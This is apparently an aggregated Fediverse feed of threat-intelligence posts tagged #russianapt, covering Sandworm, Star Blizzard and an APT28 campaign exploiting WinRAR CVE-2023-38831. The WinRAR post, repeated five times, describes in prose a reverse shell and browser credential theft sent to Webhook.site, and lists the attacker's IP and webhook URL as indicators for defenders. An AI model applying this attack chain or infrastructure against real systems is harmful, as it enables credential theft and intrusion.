#russianapt β Public Fediverse posts
Live and recent posts from across the Fediverse tagged #russianapt, aggregated by home.social.
-
π΅π± π·πΊ RuskΓ‘ skupina Sandworm v roce 2025 ΓΊtoΔila na polskou energetiku
https://infoek.cz/ruska-skupina-sandworm-v-roce-2025-utocila-na-polskou-energetiku-2026/
π΅π± π·πΊ Russian group Sandworm attacked Polish energy sector in 2025
#RussianAPT #Russia #APT #Poland #CyberSecurity #Tech #Sandworm #ESET
-
Russian APT Switches to New Backdoor After Malware Exposed by Researchers https://www.securityweek.com/russian-apt-switches-to-new-backdoor-after-malware-exposed-by-researchers/ #Nation-State #StarBlizzard #RussianAPT #Callisto #malware #Russia #APT
-
Russian APT Hackers Attacking Critical Infrastructure https://gbhackers.com/russian-apt-hackers-attacking-critical-infrastructure/ #CriticalInfrastructure #CVE/vulnerability #NetworkSecurity #cybersecurity #CyberAttack #RussianAPT
-
"π¨ #BreakingNews: WinRAR Vulnerability Exploited by Russian APT! π·πΊπ"
In October 2023, a cyber threat linked to a Russian nation-state actor exploited a vulnerability in WinRAR (CVE-2023-38831) for credential harvesting. The attack used a malicious archive file (IOC_09_11.rar) disguised as an IoC sharing file. Beware of phishing lures! π£π§
The BAT script initiated a series of PowerShell commands. Firstly, it wrote a Private RSA Key, enabling the attacker to establish a reverse shell for access to the victim's machine. Subsequently, a PowerShell script was executed to exfiltrate data, including login credentials, from Google Chrome and Microsoft Edge browsers. The stolen data was sent to a designated URL via the legitimate Webhook.site service.
This sophisticated attack was potentially associated with the Russian state-sponsored group APT28 (aka Fancy Bear, Sednit), according to Cluster25. The attack tactics and techniques align with various stages of the MITRE ATT&CK matrix, including spearphishing attachment, malicious file execution, and data exfiltration over a web service.
Indicators of compromise (IoCs) include payload hash values (SHA256, SHA1, MD5) and the IP address (216.66.35.145) and URL (http://webhook.site/e2831741-d8c8-4971-9464-e52d34f9d611) associated with the attacker's infrastructure. This incident underscores the importance of timely software patching and user awareness to prevent such cyber threats.
Source: Cluster25 Blog
Tags: #CVE202338831 #WinRAR #Phishing #CyberSecurity #APT #RussianAPT
-
"π¨ #BreakingNews: WinRAR Vulnerability Exploited by Russian APT! π·πΊπ"
In October 2023, a cyber threat linked to a Russian nation-state actor exploited a vulnerability in WinRAR (CVE-2023-38831) for credential harvesting. The attack used a malicious archive file (IOC_09_11.rar) disguised as an IoC sharing file. Beware of phishing lures! π£π§
The BAT script initiated a series of PowerShell commands. Firstly, it wrote a Private RSA Key, enabling the attacker to establish a reverse shell for access to the victim's machine. Subsequently, a PowerShell script was executed to exfiltrate data, including login credentials, from Google Chrome and Microsoft Edge browsers. The stolen data was sent to a designated URL via the legitimate Webhook.site service.
This sophisticated attack was potentially associated with the Russian state-sponsored group APT28 (aka Fancy Bear, Sednit), according to Cluster25. The attack tactics and techniques align with various stages of the MITRE ATT&CK matrix, including spearphishing attachment, malicious file execution, and data exfiltration over a web service.
Indicators of compromise (IoCs) include payload hash values (SHA256, SHA1, MD5) and the IP address (216.66.35.145) and URL (http://webhook.site/e2831741-d8c8-4971-9464-e52d34f9d611) associated with the attacker's infrastructure. This incident underscores the importance of timely software patching and user awareness to prevent such cyber threats.
Source: Cluster25 Blog
Tags: #CVE202338831 #WinRAR #Phishing #CyberSecurity #APT #RussianAPT
-
"π¨ #BreakingNews: WinRAR Vulnerability Exploited by Russian APT! π·πΊπ"
In October 2023, a cyber threat linked to a Russian nation-state actor exploited a vulnerability in WinRAR (CVE-2023-38831) for credential harvesting. The attack used a malicious archive file (IOC_09_11.rar) disguised as an IoC sharing file. Beware of phishing lures! π£π§
The BAT script initiated a series of PowerShell commands. Firstly, it wrote a Private RSA Key, enabling the attacker to establish a reverse shell for access to the victim's machine. Subsequently, a PowerShell script was executed to exfiltrate data, including login credentials, from Google Chrome and Microsoft Edge browsers. The stolen data was sent to a designated URL via the legitimate Webhook.site service.
This sophisticated attack was potentially associated with the Russian state-sponsored group APT28 (aka Fancy Bear, Sednit), according to Cluster25. The attack tactics and techniques align with various stages of the MITRE ATT&CK matrix, including spearphishing attachment, malicious file execution, and data exfiltration over a web service.
Indicators of compromise (IoCs) include payload hash values (SHA256, SHA1, MD5) and the IP address (216.66.35.145) and URL (http://webhook.site/e2831741-d8c8-4971-9464-e52d34f9d611) associated with the attacker's infrastructure. This incident underscores the importance of timely software patching and user awareness to prevent such cyber threats.
Source: Cluster25 Blog
Tags: #CVE202338831 #WinRAR #Phishing #CyberSecurity #APT #RussianAPT
-
"π¨ #BreakingNews: WinRAR Vulnerability Exploited by Russian APT! π·πΊπ"
In October 2023, a cyber threat linked to a Russian nation-state actor exploited a vulnerability in WinRAR (CVE-2023-38831) for credential harvesting. The attack used a malicious archive file (IOC_09_11.rar) disguised as an IoC sharing file. Beware of phishing lures! π£π§
The BAT script initiated a series of PowerShell commands. Firstly, it wrote a Private RSA Key, enabling the attacker to establish a reverse shell for access to the victim's machine. Subsequently, a PowerShell script was executed to exfiltrate data, including login credentials, from Google Chrome and Microsoft Edge browsers. The stolen data was sent to a designated URL via the legitimate Webhook.site service.
This sophisticated attack was potentially associated with the Russian state-sponsored group APT28 (aka Fancy Bear, Sednit), according to Cluster25. The attack tactics and techniques align with various stages of the MITRE ATT&CK matrix, including spearphishing attachment, malicious file execution, and data exfiltration over a web service.
Indicators of compromise (IoCs) include payload hash values (SHA256, SHA1, MD5) and the IP address (216.66.35.145) and URL (http://webhook.site/e2831741-d8c8-4971-9464-e52d34f9d611) associated with the attacker's infrastructure. This incident underscores the importance of timely software patching and user awareness to prevent such cyber threats.
Source: Cluster25 Blog
Tags: #CVE202338831 #WinRAR #Phishing #CyberSecurity #APT #RussianAPT
-
"π¨ #BreakingNews: WinRAR Vulnerability Exploited by Russian APT! π·πΊπ"
In October 2023, a cyber threat linked to a Russian nation-state actor exploited a vulnerability in WinRAR (CVE-2023-38831) for credential harvesting. The attack used a malicious archive file (IOC_09_11.rar) disguised as an IoC sharing file. Beware of phishing lures! π£π§
The BAT script initiated a series of PowerShell commands. Firstly, it wrote a Private RSA Key, enabling the attacker to establish a reverse shell for access to the victim's machine. Subsequently, a PowerShell script was executed to exfiltrate data, including login credentials, from Google Chrome and Microsoft Edge browsers. The stolen data was sent to a designated URL via the legitimate Webhook.site service.
This sophisticated attack was potentially associated with the Russian state-sponsored group APT28 (aka Fancy Bear, Sednit), according to Cluster25. The attack tactics and techniques align with various stages of the MITRE ATT&CK matrix, including spearphishing attachment, malicious file execution, and data exfiltration over a web service.
Indicators of compromise (IoCs) include payload hash values (SHA256, SHA1, MD5) and the IP address (216.66.35.145) and URL (http://webhook.site/e2831741-d8c8-4971-9464-e52d34f9d611) associated with the attacker's infrastructure. This incident underscores the importance of timely software patching and user awareness to prevent such cyber threats.
Source: Cluster25 Blog
Tags: #CVE202338831 #WinRAR #Phishing #CyberSecurity #APT #RussianAPT